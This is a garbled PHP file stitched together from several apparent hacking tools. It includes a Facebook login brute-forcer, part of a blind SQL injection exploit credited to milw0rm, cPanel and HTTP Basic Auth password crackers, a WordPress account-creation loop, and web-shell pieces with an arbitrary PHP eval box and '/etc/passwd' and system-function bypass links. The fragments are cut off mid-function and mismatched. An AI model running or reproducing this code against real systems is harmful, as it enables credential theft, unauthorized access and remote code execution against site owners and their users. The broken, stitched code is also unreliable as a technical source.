<?php
function brute($user, $pass)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
$check = eregi('class="s t i u"', $login) ? true : false;
if ($check == true) {
echo "No || Username : <font color='red'>{$user}</font> Password : <font color='red'>{$pass}</font></font></p>";
} else {
echo "yes || Username: <font color='green'>{$user}</font> Password : <font color='green'>{$pass}</font></font></p>";
}
}
$username = explode("\n", $_POST['username']);
$password = explode("\n", $_POST['password']);
foreach ($username as $users) {
$users = @trim($users);
foreach ($password as $pass) {
$pass = @trim($pass);
echo brute($users, $pass);
}
}
} else {
header("location:../croak");
}
$chr = 0;
while ($chr < strlen($key)) {
if (check($host, $path, $fld, $pos, $key[$chr])) {
$res .= $key[$chr];
$chr = -1;
$pos++;
}
$chr++;
}
return $res;
}
function usage()
{
echo "[+] Lito Lite Blind SQL Injection Exploit\n" . "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n" . "[+] Usage: php " . $argv[0] . " <hostname> <path> [key]\n" . "[+] Ex. php " . $argv[0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n" . "[+] Greetz to athos, marco6\n";
exit;
}
if (count($argv) < 3) {
usage();
}
$host = $argv[1];
$path = $argv[2];
if (empty($argv[3])) {
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
} else {
$key = $argv[3];
}
echo "[+] Username: "******"username", $key) . "\n" . "[+] Password: "******"password", $key) . "\n";
?>
# milw0rm.com [2009-01-03]
}
}
}
if ($cracktype == "cpanel" || $cracktype == "cpanel2") {
if ($cracktype == "cpanel2") {
$cpanel_port = "23";
} else {
$cpanel_port = "2082";
}
foreach ($userlist as $user) {
$pureuser = trim($user);
print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">\r\n Please put some good password to crack user {$pureuser} :( ... </font></b>";
if ($_POST['bruteforce'] == "true") {
echo " bruteforcing ..";
echo "<br>";
brute();
} else {
echo "<br>";
foreach ($passlist as $password) {
$purepass = trim($password);
cpanel_check($target, $pureuser, $purepass, $connect_timeout);
}
}
}
$time_end = getmicrotime();
$time = $time_end - $time_start;
print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n Cracking Finished. Elapsed time: {$time}</font> seconds</b><br><br>";
}
}
?>
echo "<option value=\"lib:lib\">lib:lib</option>";
}
echo "</select></td></tr>";
echo "<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">";
echo "<OPTION value=\"mysql\">mysql</option>\n <option value=\"ftp\">ftp</option>";
// if(function_exists(ssh2_connect)){
// echo "<option value=\"ssh\">ssh</option>";
// }
echo "</select></td>";
echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"" . $host . "\">(for lib:lib)</td></tr>";
if (function_exists(fopen)) {
echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"" . $lib . "\">";
}
echo "</table></form>";
if ($_POST['b_brute']) {
brute($_POST['box'], $_POST['box1'], $_POST['brute_host'], $_POST['lib']);
}
}
#################### Eval ######################################################
if ($r_act == "eval") {
if ($_POST['b_eval']) {
$eval = str_replace("<?", "", $_POST['php_eval']);
$eval = str_replace("?>", "", $eval);
eval($eval);
}
echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<input type=\"hidden\" value='" . $r_act . "' name=\"r_act\">";
echo "<table BORDER=1 align=center>";
echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
echo "</tr></table></form>";
function authcrackeR()
{
global $hcwd;
if (!empty($_REQUEST['target'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
$u = parse_url($_REQUEST['target']);
$host = $u['host'];
$page = $u['path'];
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if ($method == 'GET') {
$page .= $data;
}
echo '<font color=#FA0>';
if ($_REQUEST['mode'] == 'wl') {
$dictionary = fopen($_REQUEST['dictionary'], 'r');
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$so = @fsockopen($host, 80, $en, $es, 5);
if (!$so) {
echo "Can not connect to host";
break;
} else {
$packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
if ($method == 'POST') {
$packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
}
$packet .= "\r\n\r\n";
$packet .= $data;
fputs($so, $packet);
$res = substr(fgets($so), 9, 2);
fclose($so);
if ($res == '20') {
echo "U: {$user} P: {$pass}</br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
}
}
}
} else {
$code = '
$so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 );
$packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic "
. base64_encode ( "' . $user . ':".$word )."\\r\\n"';
if ($method == "POST") {
$code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
}
$code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
echo $code;
if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
echo "<b>{$user}:{$res}</b><br />";
}
}
echo 'Done!</font>';
} else {
echo '
<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Auth cracker</label>
</div><div class="fieldwrapper">
<label class="styled">Target:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" />
</div>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div><div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div>
<div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="1">POST</option><option value="0">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script>toggle();</script>';
}
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
curl_setopt($ch, CURLOPT_POSTFIELDS, "user={$user_login}&passi={$pass1}&passii={$pass2}&_wpnonce_create=code=&redirect_to=.{$victim}./author/{$user_login}");
$check = curl_exec($ch);
if (eregi('$user_login', $check)) {
echo "<p><font face='Verdana' size='1'>[+] Username Has Been Successfully Added : <font color='#008000'>{$user_login} = {$victim}</font></p>";
} else {
echo "<font face='Tahoma' size='2' color='red'> => Incorrect Code Trying More...</font><br>";
}
}
foreach ($user_login as $user) {
foreach ($pass1 as $passi) {
foreach ($pass2 as $passii) {
brute($code);
}
}
}
curl_close($ch);
}
}
}
}
if (isset($_GET['action']) && $_GET['action'] == 'rootshelleexecbpass') {
echo '<center><b class="conte">
<a href="?action=grasy">Bypass /etc/passwd</a> -
<a href="?action=nemcon">Bypass Users Server</a> -
<a href="?action=cgipl">Bypass Perl Security</a> -
<a href="?action=bypsrootwzp">Bypass With Zip File</a> -
<a href="?action=bforb">Bypass system function</a> -
} else {
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg, 1, 1);
if (!isset($ARG[$key])) {
$ARG[$key] = substr($arg, 3, strlen($arg));
}
}
}
if ($ARG[s] && $ARG[u]) {
$server = $ARG[s];
$User_id = intval($ARG[u]);
$User_id--;
print "[+] Phase 1 brute login.\n";
$login = brute($User_id, "Login");
print "\n[+] Phase 1 successfully finished: {$login}\n";
print "[+] Phase 2 brute password-hash.\n";
$hash = brute($User_id, "Password");
print "\n[+] Phase 2 successfully finished: {$hash}\n";
successfully($login, $hash);
} else {
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-23]
